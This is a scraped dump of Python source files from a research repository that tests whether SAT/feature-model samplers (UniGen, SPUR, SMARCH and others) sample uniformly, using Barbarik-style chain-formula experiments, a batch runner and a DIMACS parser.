sampleSol.endswith(' 0'):\n sampleSol = sampleSol[:-2]\n unifSol = unifSol[0].strip()\n if unifSol.endswith(' 0'):\n unifSol = unifSol[:-2]\n\n # adding more chain formulas (at most 8 in total: 3 + 5)\n # these chain formulas will have 31 solutions over 6 variables\n lenSol = len(sampleSol.split())\n for i in range(min(int(math.log(numSolutions, 2)) + 4, lenSol - 3, 5)):\n countList.append(31)\n newVarList.append(6)\n assert len(countList) == len(newVarList)\n\n # picking selector literals, i.e. k1, k2, k3, randomly\n if args.verbose:\n print(\"len count list: \" + str(len(countList)))\n print(\"#num of samples\" + str(len(sampleSol.split())))\n\n assert len(sampleSol.split()) > len(countList), \"There are not enough samples to proceed, sampler failed ?\"\n sampleLitList = random.sample(sampleSol.split(), len(countList))\n unifLitList = []\n unifSolMap = unifSol.split()\n\n # from the last version of barbarik...\n if CURR_REF_SAMPLER == SAMPLER_SPUR:\n for lit in sampleLitList:\n unifLitList.append(unifSolMap[abs(int(lit)) - 1])\n else:\n # since the reference is not always spur, some adapations are required here\n for lit in sampleLitList:\n if lit in unifSolMap:\n unifLitList.append(lit)\n elif int(lit) > 0 and str('-' + lit) in unifSolMap:\n unifLitList.append(str('-' + lit))\n elif int(lit) < 0 and str(abs(int(lit))) in unifSolMap:\n unifLitList.append(str(abs(int(lit))))\n else:\n print(\"ERROR in Sampling ! \")\n # print(\"appending: \" + unifSolMap[abs(int(lit))-1]+ \" for \"+ lit)\n # unifLitList.append(unifSolMap[abs(int(lit))-1])\n\n assert len(unifLitList) == len(sampleLitList)\n # print(unifLitList)\n # print(sampleLitList)\n\n for a, b in zip(unifLitList, sampleLitList):\n assert abs(int(a)) == abs(int(b))\n\n indicatorLits = []\n indicatorLits.append(sampleLitList)\n indicatorLits.append(unifLitList)\n\n # print(\"countList:\", countList)\n # print(\"newVarList:\", newVarList)\n # print(\"indicatorLits:\", indicatorLits)\n return ChainFormulaSetup(countList, newVarList, indicatorLits)\n\n\ndef pushVar(variable, cnfClauses):\n cnfLen = len(cnfClauses)\n for i in range(cnfLen):\n cnfClauses[i].append(variable)\n return cnfClauses\n\n\ndef getCNF(variable, binStr, sign, origTotalVars):\n cnfClauses = []\n binLen = len(binStr)\n if sign is False:\n cnfClauses.append([-(binLen + 1 + origTotalVars)])\n else:\n cnfClauses.append([binLen + 1 + origTotalVars])\n\n for i in range(binLen):\n newVar = int(binLen - i + origTotalVars)\n if sign is False:\n newVar = -1 * (binLen - i + origTotalVars)\n\n if (binStr[binLen - i - 1] == '0'):\n cnfClauses.append([newVar])\n else:\n cnfClauses = pushVar(newVar, cnfClauses)\n pushVar(variable, cnfClauses)\n return cnfClauses\n\n\ndef constructChainFormula(originalVar, solCount, newVar, origTotalVars, invert):\n assert type(solCount) == int\n\n binStr = str(bin(int(solCount)))[2:-1]\n binLen = len(binStr)\n for _ in range(newVar - binLen - 1):\n binStr = '0' + binStr\n\n firstCNFClauses = getCNF(-int(originalVar), binStr, invert, origTotalVars)\n addedClauseNum = 0\n writeLines = ''\n for cl in firstCNFClauses:\n addedClauseNum += 1\n for lit in cl:\n writeLines += \"%d \" % lit\n writeLines += '0\\n'\n\n return writeLines, addedClauseNum\n\n\n# returns whether new file was created and the list of TMP+OLD independent variables\ndef constructNewCNF(inputFile, tempFile, sampleSol, unifSol, chainFormulaConf, indVarList):\n # which variables are in pos/neg value in the sample\n sampleVal = {}\n for i in sampleSol.strip().split():\n i = int(i)\n if i 
!= 0:\n if abs(i) not in indVarList:\n continue\n\n sampleVal[abs(i)] = int(i / abs(i))\n\n # which variables are in pos/neg value in the uniform sample\n unifVal = {}\n diffIndex = -1\n for j in unifSol.strip().split():\n j = int(j)\n if j != 0:\n if abs(j) not in indVarList:\n continue\n\n unifVal[abs(j)] = int(j / abs(j))\n\n if sampleVal[abs(j)] != unifVal[abs(j)]:\n diffIndex = abs(j)\n\n # the two solutions are the same\n # can't do anything, let's do another experiment\n if diffIndex == -1:\n return False, None, None\n\n with open(inputFile, 'r') as f:\n lines = f.readlines()\n\n # variables must be shifted by sumNewVar\n sumNewVar = sum(chainFormulaConf.newVarList)\n\n # emit the original CNF, but with shifted variables\n shiftedCNFStr = ''\n for line in lines:\n line = line.strip()\n if line.startswith('p cnf'):\n numVar = int(line.split()[2])\n numCls = int(line.split()[3])\n continue\n\n if line.startswith('c'):\n # comment\n continue\n\n for x in line.split():\n x = int(x)\n if x == 0:\n continue\n sign = int(x / abs(x))\n shiftedCNFStr += \"%d \" % (sign * (abs(x) + sumNewVar))\n shiftedCNFStr += ' 0\\n'\n del i\n\n # Fixing the solution based on splittingVar\n # X = sigma1 OR X = singma2\n # All variables are set except for the index where they last differ\n solClause = ''\n splittingVar = diffIndex + sumNewVar\n for var in indVarList:\n if var != diffIndex:\n numCls += 2\n solClause += \"%d \" % (-splittingVar * sampleVal[diffIndex])\n solClause += \"%d 0\\n\" % (sampleVal[var] * (var + sumNewVar))\n\n solClause += \"%d \" % (-splittingVar * unifVal[diffIndex])\n solClause += \"%d 0\\n\" % (unifVal[var] * (var + sumNewVar))\n\n ##########\n # We add the N number of chain formulas\n # where chainFormulaConf.indicatorLits must be of size 2\n # and len(chainFormulaConf.indicatorLits) == len(chainFormulaConf.newVarList)\n # Adding K soluitons over Z variables, where\n # Z = chainFormulaConf.newVarList[k]\n # K = chainFormulaConf.countList[k]\n ##########\n invert = True\n seenLits = {}\n for indicLits in chainFormulaConf.indicatorLits: # loop runs twice\n currentNumVar = 0\n for i in range(len(indicLits)):\n newvar = chainFormulaConf.newVarList[i]\n indicLit = int(indicLits[i])\n addedClause = ''\n addedClauseNum = 0\n\n # not adding the chain formula twice to the same literal\n if indicLit not in seenLits:\n sign = int(indicLit / abs(indicLit))\n addedClause, addedClauseNum = constructChainFormula(\n sign * (abs(indicLit) + sumNewVar),\n chainFormulaConf.countList[i], newvar, currentNumVar,\n invert)\n\n seenLits[indicLit] = True\n currentNumVar += newvar\n numCls += addedClauseNum\n solClause += addedClause\n invert = not invert\n del seenLits\n del invert\n\n # create \"c ind ...\" lines\n oldIndVarList = [x + sumNewVar for x in indVarList]\n tempIndVarList = copy.copy(oldIndVarList)\n indIter = 1\n indStr = 'c ind '\n for i in range(1, currentNumVar + 1):\n if indIter % 10 == 0:\n indStr += ' 0\\nc ind '\n indStr += \"%d \" % i\n indIter += 1\n tempIndVarList.append(i)\n\n for i in oldIndVarList:\n if indIter % 10 == 0:\n indStr += ' 0\\nc ind '\n indStr += \"%d \" % i\n indIter += 1\n indStr += ' 0\\n'\n\n # dump new CNF\n with open(tempFile, 'w') as f:\n f.write('p cnf %d %d\\n' % (currentNumVar + numVar, numCls))\n f.write(indStr)\n f.write(solClause)\n # f.write(\"c -- old CNF below -- \\n\")\n f.write(shiftedCNFStr)\n\n # print(\"New file: \", tempFile)\n # exit(0)\n\n return True, tempIndVarList, oldIndVarList\n\n\nclass Experiment:\n def __init__(self, inputFile, 
maxSamples, minSamples, samplerType, refSamplerType):\n inputFileSuffix = inputFile.split('/')[-1][:-4]\n self.tempFile = tempfile.gettempdir() + \"/\" + inputFileSuffix + \"_t.cnf\"\n self.indVarList = parseIndSupport(inputFile)\n self.inputFile = inputFile\n self.samplerType = samplerType\n self.maxSamples = maxSamples\n self.minSamples = minSamples\n\n self.samplerString = get_sampler_string(samplerType)\n self.ref_sampler_type = refSamplerType\n\n # Returns True if uniform and False otherwise\n def testUniformity(self, solList, indVarList):\n solMap = {}\n baseMap = {}\n for sol in solList:\n solution = ''\n solFields = sol.split()\n for entry in solFields:\n if abs(int(entry)) in indVarList:\n solution += entry + ' '\n\n if solution in solMap.keys():\n solMap[solution] += 1\n else:\n solMap[solution] = 1\n\n if sol not in baseMap.keys():\n baseMap[sol] = 1\n else:\n baseMap[sol] += 1\n\n if not bool(solMap):\n print(\"No Solutions were given to the test\")\n exit(1)\n\n key = next(iter(solMap))\n\n print(\"baseMap: {:<6} numSolutions: {:<6} SolutionsCount: {:<6} loThresh: {:<6} hiThresh: {:<6}\".format(\n len(baseMap.keys()), self.numSolutions, solMap[key], self.loThresh, self.hiThresh))\n\n if solMap[key] >= self.loThresh and solMap[key] <= self.hiThresh:\n return True\n else:\n return False\n\n def one_experiment(self, experiment, j, i, numExperiments, tj):\n self.thresholdSolutions += self.numSolutions\n if self.thresholdSolutions < self.minSamples:\n return None, None\n\n # generate a new seed value for every different (i,j,experiment)\n newSeed = numExperiments * (i * tj + j) + experiment\n # get sampler's solutions\n sampleSol = SolutionRetriver.getSolutionFromSampler(\n self.inputFile, 1, self.samplerType, self.indVarList, newSeed)\n self.totalSolutionsGenerated += 1\n\n # get uniform sampler's solutions\n # get uniform sampler's solutions\n # unifSol = SolutionRetriver.getSolutionFromSampler(\n # self.inputFile, 1, SAMPLER_SPUR, self.indVarList, newSeed)\n # self.totalUniformSamples += 1\n\n # The reference sampler is a now a parameter of barbarik\n unifSol = SolutionRetriver.getSolutionFromSampler(\n self.inputFile, 1, self.ref_sampler_type, self.indVarList, newSeed)\n self.totalUniformSamples += 1\n\n chainFormulaConf = chainFormulaSetup(sampleSol, unifSol, self.numSolutions)\n shakuniMix, tempIndVarList, oldIndVarList = constructNewCNF(\n self.inputFile, self.tempFile, sampleSol[0], unifSol[0],\n chainFormulaConf, self.indVarList)\n\n # the two solutions were the same, couldn't construct CNF\n if not shakuniMix:\n return False, None\n\n # seed update\n newSeed = newSeed + 1\n\n # get sampler's solutions\n solList = SolutionRetriver.getSolutionFromSampler(\n self.tempFile, self.numSolutions, self.samplerType, tempIndVarList, newSeed)\n os.unlink(self.tempFile)\n self.totalSolutionsGenerated += self.numSolutions\n\n isUniform = self.testUniformity(solList, oldIndVarList)\n\n print(\"sampler: {:<8s} i: {:<4d} isUniform: {:<4d} TotalSolutionsGenerated: {:<6d}\".format(\n self.samplerString, i, isUniform,\n self.totalSolutionsGenerated))\n\n if not isUniform:\n print(\"exp:{4} RejectIteration:{0} Loop:{1} TotalSolutionsGenerated:{2} TotalUniformSamples:{3}\".format(\n i, j, self.totalSolutionsGenerated, self.totalUniformSamples, experiment))\n\n return True, True\n\n if self.thresholdSolutions > self.maxSamples:\n return True, True\n\n return True, False\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--eta', type=float, 
help=\"default = 0.9\", default=0.9, dest='eta')\n parser.add_argument('--epsilon', type=float, help=\"default = 0.3\", default=0.3, dest='epsilon')\n parser.add_argument('--delta', type=float, help=\"default = 0.05\", default=0.05, dest='delta')\n parser.add_argument('--sampler', type=int, help=str(SAMPLER_UNIGEN) + \" for UniGen;\\n\" + str(\n SAMPLER_UNIGEN3) + \" for UniGen3 (AppMC3);\\n\" +\n str(SAMPLER_QUICKSAMPLER) + \" for QuickSampler;\\n\" + str(\n SAMPLER_STS) + \" for STS;\\n\" + str(SAMPLER_CMS) + \" for CMS;\\n\" +\n str(SAMPLER_SPUR) + \" for SPUR;\\n\" + str(\n SAMPLER_SMARCH) + \" for SMARCH;\\n\" + str(SAMPLER_UNIGEN2) + \" for UniGen2;\\n\" +\n str(SAMPLER_KUS) + \" for KUS;\\n\" + str(\n SAMPLER_DISTAWARE) + \" for Distance-based Sampling;\\n\", default=SAMPLER_STS, dest='sampler')\n parser.add_argument('--ref-sampler', type=int, help=str(SAMPLER_UNIGEN) + \" for UniGen;\\n\" + str(\n SAMPLER_UNIGEN3) + \" for UniGen3 (AppMC3);\\n\" +\n str(SAMPLER_QUICKSAMPLER) + \" for QuickSampler;\\n\" + str(\n SAMPLER_STS) + \" for STS;\\n\" + str(SAMPLER_CMS) + \" for CMS;\\n\" +\n str(SAMPLER_SPUR) + \" for SPUR;\\n\" + str(\n SAMPLER_SMARCH) + \" for SMARCH;\\n\" + str(SAMPLER_UNIGEN2) + \" for UniGen2;\\n\" +\n str(SAMPLER_KUS) + \" for KUS;\\n\" + str(\n SAMPLER_DISTAWARE) + \" for Distance-based Sampling;\\n\", default=SAMPLER_STS, dest='ref_sampler')\n parser.add_argument('--reverse', type=int, default=0, help=\"order to search in\", dest='searchOrder')\n parser.add_argument('--minSamples', type=int, default=0, help=\"min samples\", dest='minSamples')\n parser.add_argument('--maxSamples', type=int, default=sys.maxsize, help=\"max samples\", dest='maxSamples')\n parser.add_argument('--seed', type=int, required=True, dest='seed')\n parser.add_argument('--verb', type=int, dest='verbose')\n parser.add_argument('--exp', type=int, help=\"number of experiments\", dest='exp', default=1)\n parser.add_argument(\"input\", help=\"input file\")\n\n args = parser.parse_args()\n inputFile = args.input\n\n eta = args.eta\n epsilon = args.epsilon\n if (eta < 2 * epsilon):\n print(\"Eta needs to be at least two times epsilon\")\n exit(1)\n delta = args.delta\n numExperiments = args.exp\n if numExperiments == -1:\n numExperiments = sys.maxsize\n searchOrder = args.searchOrder\n verbose = args.verbose\n\n seed = args.seed\n random.seed(seed)\n minSamples = args.minSamples\n maxSamples = args.maxSamples\n\n # setting the current reference sampler\n CURR_REF_SAMPLER = args.sampler\n\n # preparing features list for distribution-aware sampling\n if args.sampler == SAMPLER_DISTAWARE:\n create_features_dict(inputFile)\n\n totalLoops = int(math.ceil(math.log(2.0 / (eta + 2 * epsilon), 2)) + 1)\n listforTraversal = range(totalLoops, 0, -1)\n if searchOrder == 1:\n listforTraversal = range(1, totalLoops + 1, 1)\n\n exp = Experiment(\n minSamples=minSamples, maxSamples=maxSamples, inputFile=inputFile,\n samplerType=args.sampler, refSamplerType=args.ref_sampler)\n\n for experiment in range(numExperiments):\n print(\"Experiment: {:<5} of {:>5}\".format(experiment, numExperiments))\n breakExperiment = False\n exp.totalSolutionsGenerated = 0\n exp.totalUniformSamples = 0\n exp.thresholdSolutions = 0\n for j in listforTraversal:\n tj = math.ceil(\n math.pow(2, j) * (2 * epsilon + eta) / ((eta - 2 * epsilon) ** 2) * math.log(4.0 / (eta + 2 * epsilon),\n 2) * (\n 4 * math.e / (math.e - 1) * math.log(1.0 / delta)))\n beta = (math.pow(2, j - 1) + 1) * (eta + 2 * epsilon) * 1.0 / (\n 4 + (2 * epsilon + eta) * 
(math.pow(2, j - 1) - 1))\n gamma = (beta - 2 * epsilon) / 4\n constantFactor = math.ceil(1 / (8.79 * gamma * gamma))\n boundFactor = math.log((16) * (math.e / (math.e - 1)) * (1 / (delta * (eta - 2 * epsilon) ** 2)) * math.log(\n 4 / (eta + 2 * epsilon), 2) * math.log(1 / delta), 2)\n print(\"constantFactor:{:<4} boundFactor: {:<20} logBoundFactor: {:<20}\".format(\n constantFactor, boundFactor, math.log(boundFactor, 2)))\n print(\"tj: {:<6} totalLoops: {:<5} beta: {:<10} epsilon: {:<10}\".format(\n tj, totalLoops, beta, epsilon))\n\n exp.numSolutions = int(math.ceil(constantFactor * boundFactor))\n exp.loThresh = int((exp.numSolutions * 1.0 / 2) * (1 - (beta + 2 * epsilon) / 2))\n exp.hiThresh = int((exp.numSolutions * 1.0 / 2) * (1 + (beta + 2 * epsilon) / 2))\n print(\"numSolutions: {:<5} loThresh:{:<6} hiThresh: {:<6}\".format(\n exp.numSolutions, exp.loThresh, exp.hiThresh))\n\n i = 0\n breakExperiment = False\n while i < int(tj) and not breakExperiment:\n if args.verbose:\n print(\"*** Progress *** \" + \"i: \" + str(i) + \" j: \" + str(j) + \" ---- \" + str(j * i) + \" / \" + str(\n len(listforTraversal) * tj))\n i += 1\n ok, breakExperiment = exp.one_experiment(experiment, j, i, numExperiments, tj)\n\n if ok is None:\n continue\n\n if not ok:\n i -= 1\n continue\n\n if breakExperiment:\n break\n\n if breakExperiment:\n break\n\n if not breakExperiment:\n print(\"exp:{2} Accept:1 TotalSolutionsGenerated:{0} TotalUniformSamples:{1}\".format(\n exp.totalSolutionsGenerated,\n exp.totalUniformSamples, experiment))\n\n breakExperiment = False\n" }, { "alpha_fraction": 0.635502815246582, "alphanum_fraction": 0.6448719501495361, "avg_line_length": 48.653465270996094, "blob_id": "193b2d033c9236aee28180f17a82e1053da28037", "content_id": "c9530f5bddb561a04bd97e8966bb795048296b1f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10033, "license_type": "permissive", "max_line_length": 405, "num_lines": 202, "path": "/barbarikloop.py", "repo_name": "diverse-project/BURST", "src_encoding": "UTF-8", "text": "import os\nimport time\nfrom subprocess import check_output, TimeoutExpired, Popen, PIPE \nimport resource\nimport time\nimport csv\nimport signal\nimport argparse\nimport sys\nfrom os import listdir, chdir\nfrom os.path import isfile, join\nimport uuid\n\nSAMPLER_UNIGEN = 1\nSAMPLER_QUICKSAMPLER = 2\nSAMPLER_STS = 3\nSAMPLER_CMS = 4\nSAMPLER_UNIGEN3 = 5\nSAMPLER_SPUR = 6\nSAMPLER_SMARCH = 7\nSAMPLER_UNIGEN2 = 8\nSAMPLER_KUS = 9\nSAMPLER_DISTAWARE = 10\n\n\n\n\n# FM_DATASET_FOLDER=\"/home/gilles/samplingforfm/Benchmarks/FeatureModels/\"\n# keep it for Gilles' debugging\nFM_GILLES_FOLDER =\"/home/gilles/GillesTestModels/\"\n# FM2_DATASET_FOLDER=\"/home/gilles/samplingforfm/Benchmarks/FMEasy/\"\n# FLA_DATASET_FOLDER=\"/home/gilles/samplingforfm/Benchmarks/\"\n# FLABLASTED_DATASET_FOLDER=\"/home//gilles/samplingforfm/Benchmarks/Blasted_Real/\"\n# FLAV7_DATASET_FOLDER=\"/home/gilles/samplingforfm/Benchmarks/V7/\"\n# BENCH_ROOT_FOLDER=\"/home/gilles/samplingforfm/\" # deprecated/unused\n# ALL_BENCH_DATASET_FOLDER = \"/home/gilles/samplingforfm/Benchmarks/\" # deprecated/unused\n# FLAV3_DATASET_FOLDER=\"/home/gilles/samplingforfm/Benchmarks/V3/\"\n# FLAV15_DATASET_FOLDER=\"/home/gilles/samplingforfm/Benchmarks/V15/\"\n# 
FMLINUX_DATASET_FOLDER=\"/home/gilles/fm_history_linux_dimacs/\"\n\nFM_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/FeatureModels/\"\nFM2_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/FMEasy/\"\nFLA_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/\"\nFLABLASTED_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/Blasted_Real/\"\nFLAV7_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/V7/\"\nFLAV3_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/V3/\"\nFLAV15_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/V15/\"\nFMLINUX_DATASET_FOLDER=\"/home/fm_history_linux_dimacs/\"\n\n\ndataset_fla = { 'fla' : FLA_DATASET_FOLDER, 'fm' : FM_DATASET_FOLDER, 'fmeasy' : FM2_DATASET_FOLDER, 'V15' : FLAV15_DATASET_FOLDER, 'blasted_real' : FLABLASTED_DATASET_FOLDER, 'gilles': FM_GILLES_FOLDER }\n\n\n# field names \nfields = ['file', 'time','cmd_output','err_output','Uniform','Timeout'] \n \ndef all_cnf_files(folder):\n return [join(folder, f) for f in listdir(folder) if isfile(join(folder, f)) and f.endswith(\".cnf\")]\n\ndef all_dimacs_files(folder):\n return [join(folder, f) for f in listdir(folder) if isfile(join(folder, f)) and f.endswith(\".dimacs\")]\n\n\ndef get_sampler_string(samplerType):\n if samplerType == SAMPLER_UNIGEN:\n return 'UniGen'\n if samplerType == SAMPLER_UNIGEN3:\n return 'UniGen3'\n if samplerType == SAMPLER_QUICKSAMPLER:\n return 'QuickSampler'\n if samplerType == SAMPLER_STS:\n return 'STS'\n if samplerType == SAMPLER_CMS:\n return 'CustomSampler'\n if samplerType == SAMPLER_SPUR:\n return 'SPUR'\n if samplerType == SAMPLER_SMARCH:\n return 'SMARCH'\n if samplerType == SAMPLER_UNIGEN2:\n return 'UNIGEN2'\n if samplerType == SAMPLER_KUS:\n return 'KUS'\n if samplerType == SAMPLER_DISTAWARE:\n return 'DistanceBasedSampling'\n print(\"ERROR: unknown sampler type\")\n exit(-1)\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--eta', type=float, help=\"default = 0.9\", default=0.9, dest='eta')\n parser.add_argument('--epsilon', type=float, help=\"default = 0.3\", default=0.3, dest='epsilon')\n parser.add_argument('--delta', type=float, help=\"default = 0.05\", default=0.05, dest='delta')\n parser.add_argument('--sampler', type=int, help=str(SAMPLER_UNIGEN)+\" for UniGen;\\n\" + str(SAMPLER_UNIGEN3)+\" for UniGen3 (AppMC3);\\n\" +\n str(SAMPLER_QUICKSAMPLER)+\" for QuickSampler;\\n\"+str(SAMPLER_STS)+\" for STS;\\n\" + str(SAMPLER_CMS)+\" for CMS;\\n\" +\n str(SAMPLER_SPUR)+\" for SPUR;\\n\" + str(SAMPLER_SMARCH)+\" for SMARCH;\\n\" + str(SAMPLER_UNIGEN2)+\" for UniGen2;\\n\" +\n str(SAMPLER_KUS)+\" for KUS;\\n\" + str(SAMPLER_DISTAWARE)+\" for Distance-based Sampling;\\n\", default=SAMPLER_STS, dest='sampler')\n parser.add_argument('--ref-sampler', type=int, help=str(SAMPLER_UNIGEN)+\" for UniGen;\\n\" + str(SAMPLER_UNIGEN3)+\" for UniGen3 (AppMC3);\\n\" +\n str(SAMPLER_QUICKSAMPLER)+\" for QuickSampler;\\n\"+str(SAMPLER_STS)+\" for STS;\\n\" + str(SAMPLER_CMS)+\" for CMS;\\n\" +\n str(SAMPLER_SPUR)+\" for SPUR;\\n\" + str(SAMPLER_SMARCH)+\" for SMARCH;\\n\" + str(SAMPLER_UNIGEN2)+\" for UniGen2;\\n\" +\n str(SAMPLER_KUS)+\" for KUS;\\n\" + str(SAMPLER_DISTAWARE)+\" for Distance-based Sampling;\\n\", default=SAMPLER_STS, dest='ref_sampler')\n parser.add_argument('--reverse', type=int, default=0, help=\"order to search in\", dest='searchOrder')\n parser.add_argument('--minSamples', type=int, default=0, help=\"min samples\", dest='minSamples')\n parser.add_argument('--maxSamples', type=int, default=sys.maxsize, help=\"max samples\", dest='maxSamples')\n 
parser.add_argument('--seed', type=int, required=True, dest='seed')\n    parser.add_argument('--verb', type=int,help=\"verbose, 0 or 1, default=1\", default=1, dest='verbose')\n    parser.add_argument('--exp', type=int, help=\"number of experiments\", dest='exp', default=1)\n    parser.add_argument('--timeout',type=int, help=\"timeout in seconds\", dest='thres', default=600)\n    parser.add_argument('-flas','--formulas', nargs=\"+\", help='formulas or feature models to process (cnf or dimacs files typically). You can also specify \"FeatureModels\", \"FMEasy\", \"Blasted_Real\", \"V7\", \"V3\", \"V15\", \"Benchmarks\", or \"fm_history_linux_dimacs\" to target specific folders', default=None)\n\nargs = parser.parse_args()\n\n\noutput_directory = \"output/\" + str(uuid.uuid4().hex) \nif not os.path.exists(output_directory):\n    os.makedirs(output_directory)\n\n# name of csv file \nfilename = os.path.join(output_directory, 'Uniform-' + get_sampler_string(args.sampler) + '.csv')\n\ninfo_experiment_file = os.path.join(output_directory, 'README.md')\nwith open(info_experiment_file, 'w') as expfile:\n    expfile.write(str(args))\n\n\n\nflas_args = args.formulas\n\nflas_to_process = []\nprint(\"pre-processing models to analyse for uniformity\")\nif flas_args is not None:\n    print(\"formulas to process explicitly given\", flas_args)\n    for fla_arg in flas_args:\n        if fla_arg == \"fm_history_linux_dimacs\":\n            print(\"folder of Linux formulas (SPLC challenge track)\", fla_arg)\n            print(\"WARNING: requires the big dataset, use the appropriate Docker image eg macher/usampling:fmlinux\") \n            flas_to_process.extend(all_dimacs_files(FMLINUX_DATASET_FOLDER))\n        elif fla_arg in 'gilles': #debug\n            print(\"selection of FMs selected by Gilles, for debug\")\n            flas_to_process.extend(all_cnf_files(FM_GILLES_FOLDER)) \n        elif fla_arg in \"Benchmarks\": # debug or deprecated? 
\n print(\"folder of formulas\", fla_arg)\n # flas_to_process.extend(all_cnf_files(BENCH_ROOT_FOLDER + fla_arg))\n flas_to_process.extend(all_cnf_files(\"/home/samplingfm/\" + fla_arg)) \n elif fla_arg in (\"FeatureModels\", \"FMEasy\", \"Blasted_Real\", \"V7\", \"V3\", \"V15\"):\n print(\"folder of formulas\", fla_arg)\n flas_to_process.extend(all_cnf_files(FLA_DATASET_FOLDER + fla_arg))\n else:\n print('individual formula', fla_arg)\n flas_to_process.append(fla_arg)\nelse: # by default \n print(\"default dataset/folders\", dataset_fla)\n for dataset_key, dataset_folder in dataset_fla.items():\n flas_to_process.extend(all_cnf_files(dataset_folder))\n\nprint(len(flas_to_process), \"formulas to process\", flas_to_process)\n\n \n# writing to csv file \nwith open(filename, 'w') as csvfile:\n #status = 0 \n # creating a csv dict writer object \n writer = csv.DictWriter(csvfile, fieldnames = fields)\n # writing headers (field names) \n writer.writeheader() \n\n for b in flas_to_process:\n try:\n print(\"Processing \" + b)\n start = time.time()\n c = ''\n err = ''\n sampler_cmd = [\"python3\",\"barbarik.py\",\"--seed\",str(args.seed),\"--verb\",str(args.verbose),\"--eta\",str(args.eta),\"--epsilon\",str(args.epsilon),\"--delta\",str(args.delta),\"--reverse\",str(args.searchOrder),\"--exp\",str(args.exp),\"--minSamples\",str(args.minSamples),\"--maxSamples\",str(args.maxSamples),\"--sampler\",str(args.sampler),\"--ref-sampler\",str(args.ref_sampler),\"--verb\",str(args.verbose),b]\n print(\"cmd: \"+ str(sampler_cmd)) \n proc= Popen(sampler_cmd, stdout=PIPE, stderr=PIPE,preexec_fn=os.setsid)\n c,err= proc.communicate(timeout=args.thres)\n #c=check_output(sampler_cmd,timeout=10,preexec_fn=os.setsid)\n if c: \n print(\"barbarik output: \" + format(c))\n uniform = None\n if \"isUniform: 0\" in format(c):\n uniform = False\n print(\"NOT UNIFORM\")\n elif \"isUniform: 1\" in format(c):\n uniform = True\n print(\"UNIFORM\")\n else:\n uniform = \"N/A\"\n writer.writerow({'file': b, 'time': \"{:.3f}\".format(time.time() - start),'cmd_output': format(c),'err_output': format(err), 'Uniform': uniform,'Timeout':'FALSE'})\n else: \n writer.writerow({'file': b, 'time': \"{:.3f}\".format(time.time() - start),'cmd_output': \"NULL\",'err_output': format(err),'Uniform':\"N/A\",'Timeout':'FALSE'})\n csvfile.flush()\n except TimeoutExpired:\n print('TIMEOUT')\n writer.writerow({'file': b, 'time': \"{:.3f}\".format(time.time() - start),'cmd_output': format(c),'err_output': format(err),'Uniform':\"N/A\",'Timeout':'TRUE'})\n csvfile.flush()\n os.killpg(os.getpgid(proc.pid),signal.SIGTERM) \n except:\n writer.writerow({'file': b, 'time': \"{:.3f}\".format(time.time() - start),'cmd_output': format(c),'err_output': format(err),'Uniform':\"N/A\",'Timeout':'FALSE'})\n csvfile.flush()\n os.killpg(os.getpgid(proc.pid),signal.SIGTERM) \n" }, { "alpha_fraction": 0.47814303636550903, "alphanum_fraction": 0.4843878746032715, "avg_line_length": 30.147727966308594, "blob_id": "281da97eb9830e31a6d38e5d7b7a2407568d9c9a", "content_id": "1600a5a5096c10d0052b8242f813089fc3c64edb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16974, "license_type": "permissive", "max_line_length": 153, "num_lines": 528, "path": "/samplers/smarch.py", "repo_name": "diverse-project/BURST", "src_encoding": "UTF-8", "text": "\"\"\"\r\nSmarch - random sampling of propositional formula solutions\r\nVersion - 0.1\r\n\"\"\"\r\n\r\n\r\nimport random\r\nfrom subprocess import getoutput\r\nimport 
pycosat\r\nimport os\r\nimport time\r\nimport sys\r\nimport getopt\r\nimport shutil\r\n\r\nfrom anytree import AnyNode\r\nfrom anytree.exporter import JsonExporter\r\nfrom anytree.importer import JsonImporter\r\n\r\nsrcdir = os.path.dirname(os.path.abspath(__file__))\r\nSHARPSAT = srcdir + '/sharpSATSMARCH/Release/sharpSAT'\r\nMARCH = srcdir + '/march_cu/march_cu'\r\n\r\n\r\n\r\ndef read_dimacs(dimacsfile_):\r\n \"\"\"parse variables and clauses from a dimacs file\"\"\"\r\n\r\n _features = list()\r\n _clauses = list()\r\n _vcount = '-1' # required for variables without names\r\n\r\n with open(dimacsfile_) as f:\r\n for line in f:\r\n # read variables in comments\r\n if line.startswith(\"c ind\"): #we do not deal with independant variables produced by other tool - modification w.r.t original SMARCH MP \r\n continue \r\n elif line.startswith(\"c\"):\r\n line = line[0:len(line) - 1]\r\n _feature = line.split(\" \", 4)\r\n del _feature[0]\r\n # handling non-numeric feature IDs - modification w.r.t original SMARCH MP, necessary to parse os-like models with $ in feature names...\r\n if len(_feature) <= 2 and len(_feature) > 0: # needs to deal with literate comments, e.g., in V15 models\r\n \r\n if (_feature[0].isdigit()):\r\n _feature[0] = int(_feature[0])\r\n else:\r\n # num_filter = filter(_feature[0].isdigit(), _feature[0])\r\n num_feature = \"\".join(c for c in _feature[0] if c.isdigit())\r\n _feature[0] = int(num_feature)\r\n _features.append(tuple(_feature))\r\n # read dimacs properties\r\n elif line.startswith(\"p\"):\r\n info = line.split()\r\n _vcount = info[2]\r\n # read clauses\r\n else:\r\n info = line.split()\r\n if len(info) != 0:\r\n _clauses.append(list(map(int, info[:len(info)-1])))\r\n return _features, _clauses, _vcount\r\n\r\n\r\ndef read_constraints(constfile_, features_):\r\n \"\"\"read constraint file. 
